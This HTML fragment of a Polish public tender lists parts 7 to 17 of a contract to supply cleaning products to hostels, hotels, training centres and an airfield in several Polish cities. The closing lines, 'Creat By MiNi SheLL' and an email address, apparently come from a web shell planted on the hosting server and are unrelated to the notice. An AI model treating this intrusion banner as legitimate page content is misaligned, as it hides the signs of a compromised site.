<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Olsztyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Bursy LANDOR w Olsztynie, położonej przy ul. Dąbrowszczaków 25,  w ilościach i asortymencie określonym w załączniku nr 1g do SIWZ - Formularz kalkulacji cenowej dla części nr 7, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-3, 39.83.10.00-6, 39.83.11.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Gorzów Wlkp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do obiektu Stacja Paliw w Gorzowie Wlkp., położonej przy ul. Wróblewskiego 4, 66-400 Gorzów Wlkp. w ilościach i asortymencie określonym w załączniku nr 1h do SIWZ - Formularz kalkulacji cenowej dla części nr 8, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Poznań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Zespołu Obiektów OLIMPIA i JOWISZ w Poznaniu, położonych odpowiednio przy ul. Taborowa 8, 60-790 Poznań oraz przy ul. Dojazd 34, 60-631 Poznań, w ilościach i asortymencie określonym w załączniku nr 1i do SIWZ - Formularz kalkulacji cenowej dla części nr 9, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Warszawa Hotele.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do obiektu HOTEL KARAT w Warszawie, położonego przy ul. Słoneczna 37, 00-789 Warszawa, do obiektu HOTEL ŁAZIENKOWSKI w Warszawie, położonego przy ul. 29 Listopada 3B, 00-465 Warszawa, oraz do obiektu BUFET PUŁAWSKA położonego przy ul. Puławska 148/150, 02-624 Warszawa w ilościach i asortymencie określonym w załączniku nr 1j do SIWZ - Formularz kalkulacji cenowej dla części nr 10, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Warszawa Bursy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Zespołu Burs położonych w Warszawie przy ul. Włochowska 25/33, 03-336 Warszawa oraz w Piasecznie przy ul. Puławska 44, 05-500 Piaseczno w ilościach i asortymencie określonym w załączniku nr 1K do SIWZ - Formularz kalkulacji cenowej dla części nr 11, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Lotnisko Warszawa-Babice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do obiektu LOTNISKO WARSZAWA-BABICE w Warszawie, położonego przy ul. Gen. Bryg. S. Kaliskiego 57, 00-476 Warszawa, w ilościach i asortymencie określonym w załączniku nr 1l do SIWZ - Formularz kalkulacji cenowej dla części nr 12, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Wrocław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Bursy SAVOY we Wrocławiu, położonego przy Pl. Kościuszki 19, 50-027 Wrocław, w ilościach i asortymencie określonym w załączniku nr 1m do SIWZ - Formularz kalkulacji cenowej dla części nr 13, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Szklarska Poręba.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Wypoczynkowego OLIMP w Szklarskiej Porębie położonego przy ul. 1-go Maja 62, 58-580 Szklarska Poręba, w ilościach i asortymencie określonym w załączniku nr 1n do SIWZ - Formularz kalkulacji cenowej dla części nr 14, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Opole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Bursy CUL w Opolu, położonej przy ul. Gospodarcza 8, 45-759 Opole, w ilościach i asortymencie określonym w załączniku nr 1o do SIWZ - Formularz kalkulacji cenowej dla części nr 15, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zakopane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Wypoczynkowego DAFNE w Zakopanem, położonego przy ul. Jagiellońska 30, 34-500 Zakopane, w ilościach i asortymencie określonym w załączniku nr 1p do SIWZ - Formularz kalkulacji cenowej dla części nr 16, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-3, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Polańczyk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków i materiałów do utrzymania czystości do Ośrodka Szkoleniowo-Wypoczynkowego JAWOR w Polańczyku, położonym przy ul.  Zdrojowa 21, 38-610 Polańczyk, w ilościach i asortymencie określonym w załączniku nr 1q do SIWZ - Formularz kalkulacji cenowej dla części nr 17, który został udostępniony na stronie internetowej Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.81.13.00-2, 39.83.10.00-6, 39.83.12.10-1, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com